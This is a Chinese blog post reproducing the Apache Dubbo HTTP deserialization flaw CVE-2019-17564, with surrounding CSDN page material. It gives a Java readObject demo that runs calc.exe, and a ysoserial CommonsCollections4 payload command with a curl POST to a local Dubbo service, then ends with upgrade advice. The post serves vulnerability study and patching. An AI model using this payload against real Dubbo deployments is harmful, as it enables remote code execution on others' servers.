有关Apache dubbo反序列化漏洞的复现及思考

最新推荐文章于 2023-07-26 17:11:01 发布
最新推荐文章于 2023-07-26 17:11:01 发布
阅读量998 收藏 1
点赞数 2
分类专栏: dubbo 文章标签: dubbo
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43275277/article/details/106597045
版权

有关Apache dubbo反序列化漏洞(CVE-2019-17564)网上有许多漏洞复现文章,官方漏洞描述也说的很清楚,开启了http remoting协议时,存在反序列化漏洞。本身有关java的漏洞,反序列化占了很大一部分。大概流程就是应用程序在反序列化时执行了恶意代码导致RCE(remote command/code execute)。

先来看一个自定义对象反序列化引发RCE的示例:

public class SerialDemo {
  public static void main(String[] args) throws Exception{
    FileOutputStream fileInputStream = new FileOutputStream("D://Bird.obj");
    ObjectOutputStream oos= new ObjectOutputStream(fileInputStream);
    oos.writeObject(new Bird());
    oos.close();
    FileInputStream fileInputStream1 = new FileInputStream("D://Bird.obj");
    ObjectInputStream ois = new ObjectInputStream(fileInputStream1);
    ois.readObject();
    ois.close();
  }
}
class Bird implements Serializable {
  private final void readObject(ObjectInputStream in) throws Exception{
    Runtime.getRuntime().exec("calc.exe");
  }
}

在Bird类中声明了readObject方法,反序列化时会通过反射调用这个方法导致RCE,dubbo反序列化漏洞类似,但调用链远比这个要复杂。

下面使用dubbo http示例复现一下反序列化漏洞,通过Ysoserial生成利用反序列化漏洞payload,基于CommonsCollections4类库的gadget,注意版本使用的4.0,大于4.0没有此漏洞。

<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>

下载dubbo-sample-http,地址https://github.com/apache/dubbo-samples/tree/master/java,dubbo版本改为2.7.3,直接运行provider程序即可。使用curl命令,发送post请求,附带由Ysoserial生成的payload,其他模拟请求工具均可。

java -jar ysoserial-xxx.jar CommonsCollections4 "calc" > payload
curl --data-binary @payload
http://127.0.0.1:8080/org.apache.dubbo.samples.http.api.DemoService

有漏洞当然要升级了,针对此漏洞首先要确定是否使用了dubbo http,如果使用的是rest服务(基于resteasy)不受此漏洞影响。

dubbo作为一个rpc框架,通常都是内网应用,如果需要对外提供服务可以前置http网关接口,个人觉得没有必要给dubbo开放http接口。各位读者朋友如何看待呢?

觉得有用,点个关注,【码农小麦】公众号同

码农小麦
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Aapche Dubbo 反序列化漏洞复现(CVE-2019-17564)
0xSec
12-24 699
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564,Apache-Dubbo反序列化漏洞
CVE-2019-17564漏洞复现[基于Ubuntu 16.04 LTS]
rep_Su的博客
02-15 4833
基于Ubuntu 16.04 LTS的CVE-2019-17563漏洞复现0x0 漏洞描述0x1 影响范围0x2 漏洞复现环境准备环境搭建漏洞展示0x3 其他修复建议关于此文参考链接 0x0 漏洞描述 Apache Dubbo支持多种协议,官方推荐使用 Dubbo 协议,CVE-2019-17564是属于Apache Dubbo HTTP协议中的一个反序列化漏洞,该漏洞的主要原因在于当Apache...
【web漏洞】PHP反序列化
weixin_51614272的博客
04-25 3303
知识点 PHP反序列化只能修改成员变量的值和构造方法,其他的代码区不能修改
记一次typecho反序列化漏洞复现(第一次写poc版)
m0_62100902的博客
06-28 1104
经过一系列的代码审计,终于找到一个可以利用的点,其余的属性全都是写死了的,也就是静态this的调用方式,而这里不是静态的,它可以是别的对象里面去调用这个属性,那么我们可以想到一种魔术方法:__get(),这个魔术方法是当对象中调用不存在的属性时候会自动去调用这个魔术方法,那么我们需要去找到一个既有__get()魔术方法的又没有screenName这个属性的对象(这里终于来点感觉了),继续在代码审计工具里面找__get()说一说我的个人理解吧。举个例子,php与java之间是如何相互传输的呢?
php反序列化漏洞(万字详解)
永不落的梦想
07-26 2094
php反序列化万字文章详解,非常全面,并结合实际案例易于理解,包括pop链、字符串逃逸、session反序列化、phar反序列化、原生类的利用以及各种绕过方式。
Apache Dubbo反序列化漏洞复现分析
include_voidmain的博客
03-10 2961
Apache Dubbo反序列化漏洞复现分析
Web安全--反序列化漏洞详解(php篇)
bobo_milk的博客
11-29 1041
反序列化
CVE-2019-17564 Apache Dubbo Http 反序列化漏洞深入分析 .pdf
09-05
CVE-2019-17564 Apache Dubbo Http 反序列化漏洞深入分析 业务安全 金融安全 网络信息安全 安全建设 渗透测试
dubbo-exp:Dubbo反序列化一键快速攻击测试工具,支持dubbo协议和http协议,支持hessian反序列化和java原生反序列化
05-09
工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果使用者负责Dubbo反序列化测试工具使用帮助usage: java -jar exp.jar [OPTION]-h --help 帮助信息-l --list 输出所有gadget信息-g --gadget ...
Java反序列化生成Payload附利用脚本
02-12
Java反序列化生成Payload附利用脚本,帮助运维测试weblogic及jboss等中间件的漏洞
Apache Dubbo远程代码执行漏洞(CVE-2021-43297)
10-25
Dubbo 升级到 2.6.12、2.7.15、3.0.5 及以上版本
Apache Dubbo
最新发布
08-18
Apache DubboSpring Boot项目使创建[Spring Boot]变得容易(https://github.com/spring-projects/spring-boot/)使用Dubbo作为RPC框架的应用程序。
反序列化漏洞(PHP)
qq_42383069的博客
05-18 6352
反序列化漏洞 0x01. 序列化和反序列化是什么 序列化:变量转换为可保存或传输的字符串的过程; 反序列化:把序列化的字符串再转化成原来的变量使用 作用:可轻松地存储和传输数据,使程序更具维护性 0x02. 为什么会有序列化 序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构 0x03. 序列化和反序列化代码示例 <?php class User { public $username = 'admin'; public $password = '123456';
shiro defaultkey无利用_深入利用Shiro反序列化漏洞
weixin_35734296的博客
01-06 2984
0x00:背景shiro反序列化RCE是在实战中一个比较高频且舒适的漏洞,shiro框架在java web登录认证中广泛应用,每一次目标较多的情况下几乎都可以遇见shiro,而因其payload本身就是加密的,无攻击特征,所以几乎不会被waf检测和拦截。0x01:shiro反序列化的原理先来看看shiro在1.2.4版本反序列化的原理这里是shiro拿到cookie后的关键代码,先dec...
漏洞挖掘:一次反序列化漏洞学习
dzqxwzoe的博客
02-04 167
CVE-2017-3248 使用了RMI反序列化漏洞,也揭开了笔者分析RMI漏洞原理的新篇章。后面将不断分析Weblogic相关反序列化漏洞,以及系统总结整理RMI反序列化漏洞的基础知识和简单利用。
CVE-2017-12149JBoss 反序列化漏洞利用
weixin_30314631的博客
05-04 477
CVE-2017-12149 漏洞描述 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。 影响范围 漏洞影响5.x和6.x版本的JBOSSAS。 漏洞原理 JBOSS Application Server是一个基于J2EE的开放源代码的应...
网络安全之反序列化漏洞复现
kali_Ma的博客
11-22 2281
Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。CAS 全程Central Authentication Service(中心认证服务),是一个单点登录协议,Apereo CAS是实现该协议的软件包。单点登录定义单点登录(Single sign on),英文名称缩写SSO,SSO的意思就是在多系统的环境中,登录单方系统,就可以在不用再次登录的情况下访问相关受信任的系统,也就是说只要登录一次单体系统就可以。
排查log4j:WARN No appenders could be found for logger (org.apache.dubbo.common.logger.LoggerFactory)
热门推荐
码农小麦
06-11 1万+
错误信息 有关启动dubbo服务,报出如下错误: log4j:WARN No appenders could be found for logger (org.apache.dubbo.common.logger.LoggerFactory). log4j:WARN Please initialize the log4j system properly. 用过log4j的同学应该能看出来,就是少个log4j.properties配置文件,不知道dubbo为什么默认使用的是log4j,咱还是看下源码找下
apache dubbo
07-28
Apache Dubbo 是一个高性能、轻量级的开源 RPC 框架,它提供了分布式服务的支持,使得不同服务之间可以方便地进行通信和调用。Dubbo 提供了服务注册与发现、负载均衡、容错机制等功能,可以帮助开发者快速构建分布式...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

码农小麦

一起学习共同进步

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值